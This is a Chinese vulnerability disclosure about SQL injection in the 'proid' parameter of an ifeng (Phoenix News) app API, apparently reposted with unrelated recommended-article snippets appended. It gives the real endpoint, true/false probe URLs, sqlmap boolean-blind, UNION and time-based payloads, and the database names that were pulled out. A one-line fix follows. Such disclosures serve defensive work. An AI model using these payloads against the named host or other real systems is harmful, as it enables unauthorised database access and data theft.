凤凰网某应用sql注入漏洞

凤凰新闻手机app的一个api接口过滤不严,存在注入漏洞。

注入点:http://api.iapps.ifeng.com/news/upgrade.json?gv=4.2.0&proid=ifengnews&os=android_19&screen=720x1206&publishid=2011&zip=1,受影响参数:proid

证明:

http://api.iapps.ifeng.com/news/upgrade.json?gv=4.2.0&proid=ifengnews' and '12'='12&os=android_19&screen=720x1206&publishid=2011&zip=1 返回正常数据

http://api.iapps.ifeng.com/news/upgrade.json?gv=4.2.0&proid=ifengnews' and '22'='12&os=android_19&screen=720x1206&publishid=2011&zip=1 返回数据异常

sqlmap无压力,貌似凤凰汽车频道的库也在其中,

sqlmap identified the following injection points with a total of 50 HTTP(s) requests:

---

Place: GET

Parameter: proid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: gv=4.2.0&proid=ifengnews' AND 8025=8025 AND 'lqID'='lqID&os=android_19&screen=720x1206&publishid=2011&zip=1

Type: UNION query

Title: MySQL UNION query (NULL) - 14 columns

Payload: gv=4.2.0&proid=-6406' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7166717471,0x457a716d67506d734978,0x716d696471),NULL,NULL,NULL,NULL,NULL#&os=android_19&screen=720x1206&publishid=2011&zip=1

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: gv=4.2.0&proid=ifengnews' AND SLEEP(5) AND 'tWlX'='tWlX&os=android_19&screen=720x1206&publishid=2011&zip=1

---

[09:36:11] [INFO] the back-end DBMS is MySQL

web application technology: Nginx

back-end DBMS: MySQL 5.0.11

[09:36:11] [INFO] fetching database names

[09:36:11] [INFO] the SQL query used returns 5 entries

[09:36:11] [INFO] retrieved: "information_schema"

[09:36:11] [INFO] retrieved: "auto_ifeng"

[09:36:11] [INFO] retrieved: "auto_ifeng_2"

[09:36:11] [INFO] retrieved: "mobile_ifeng"

[09:36:12] [INFO] retrieved: "test"

available databases [5]:

[*] auto_ifeng

[*] auto_ifeng_2

[*] information_schema

[*] mobile_ifeng

[*] test

修复方案:

过滤,参数化

相关标签:

本文原创发布php中文网,转载请注明出处,感谢您的尊重!

凤凰网php,凤凰网某应用sql注入漏洞_MySQL相关推荐

  1. 动网 php v1.0 漏洞,动网论坛dispuser.php页面SQL注入漏洞

    受影响系统: 动网论坛 Dvbbs php 2.0++ 描述: DVBBS是一款Aspsky.Net开发和维护的开放源码ASP Web论坛程序. 在DVBBS的dispuser.php文件中: if( ...

  2. 126disk网盘sql注入漏洞

    2019独角兽企业重金招聘Python工程师标准>>> sql注入点有很多,有用户登录注入,如万能密码 admin' or 1=1-- :还有Web程序中的一些交互注入,如查询之类. ...

  3. 优酷网 存在sql注入漏洞

    漏洞详情 披露状态: 2010-07-21: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 19 ...

  4. SQL注入漏洞的检测与防范技术

    提 要   本文从SQL注入的基本概念和注入原理入手,分析总结了SQL注入漏洞的检测及其防范技术措施. 关键词  SQL注入漏洞 检测 防范技术 引 言    近几年来随着计算机网络和WEB技术的飞速 ...

  5. php网站漏洞检测对sql注入漏洞防护

    近日,我们SINE安全对metinfo进行网站安全检测发现,metinfo米拓建站系统存在高危的sql注入漏洞,攻击者可以利用该漏洞对网站的代码进行sql注入攻击,伪造恶意的sql非法语句,对网站的数 ...

  6. 白帽子发现美军网站SQL注入漏洞,可获取敏感数据

    去年有报道称,美军收购软件漏洞为网战准备.而美军自己的网站和服务器究竟又有多安全?一名独立安全研究者已经发现了美军网站的几个较为严重的安全漏洞. 安全专家称,这些漏洞说明了美国防部网络安全基础的脆弱性 ...

  7. SQL注入漏洞入门(操作实现)

    一 Sql-Inject的概述 SQL注入(SQLi)是一种注入攻击,,可以执行恶意SQL语句.它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器.攻击者可以使 ...

  8. 蓝雨设计整站SQL注入漏洞

    本来是投稿文章来的,因为稿件的问题所以就上不了杂志,再加上最近有些人在网站留言说三道四的猜测蓝雨的问题,所以我就公开漏洞预警所说的漏洞,官方已经把版本都打了补丁,当然有些使用网站至今还是存在着SQL注 ...

  9. 浅谈SQL注入漏洞原理及利用方式

    1.SQL注入 原理: 在数据交互中,前端的数据传入到后台处理时,由于后端没有做严格的判断,导致其传入的恶意"数据"拼接到SQL语句中后,被当作SQL语句的一部分执行.漏洞产生于脚 ...

最新文章

  1. 作者免费分享自己论文也不行,知名学术社交网站被判侵权,此前已下架20万余篇论文...
  2. Harris’s Linked List
  3. 【2018北京集训(六)】Lcm
  4. oracle LPDA,oracle中自动增长列的设置
  5. KVM虚拟化笔记(七)------kvm虚拟机VNC的配置
  6. 信息学奥赛C++语言: 求和
  7. 一图读懂基于鲲鹏处理器的全栈混合云华为云Stack6.5
  8. python tkinter库 pack布局方法调用
  9. java多线程编程(三)- 线程的创建
  10. 【网络文摘】程序人生:我们工作到底为了什么
  11. thinkphp5 excel导入导出
  12. python 物理引擎 摩擦力_python下的Box2d物理引擎的配置
  13. Dynamo Revit 钢箱梁、混凝土箱梁、桥墩、盖梁建模的相关经验
  14. 电子商务计算机考研学校排名,电子商务考研院校排名
  15. 移动应用中的第三方SDK隐私合规检测
  16. 滑环在机电行业的应用
  17. PCI-Express转4串/8串/28串口CH384的硬件配置及设计
  18. SysML实践指南第二版(中文翻译:刘亚龙)第16章 蒸馏器案例
  19. Android神奇“控件”-----RemoteViews
  20. Linux应用编程-音频应用编程-语音转文字项目

热门文章

  1. Linux多线程开发-线程同步-条件变量pthread_cond_t
  2. php redis 删除元素,redisTemplate.delete()不能删除元素
  3. 电感检测_三、电感线圈的识别与检测(二)
  4. iOS新版微信底部返回横条问题
  5. [Github项目]基于PyTorch的深度学习网络模型实现
  6. 电脑cpu温度过高怎么办_网络资讯:电脑cpu占用过高处理办法
  7. https证书pfx 生成 pem,crt,key
  8. Pro ASP.NET 4 CMS
  9. Python3爬虫(十一) 爬虫与反爬虫
  10. 用户思维模型,围绕用户核心四大模块,拉新、养熟、成交、裂变循环的效果...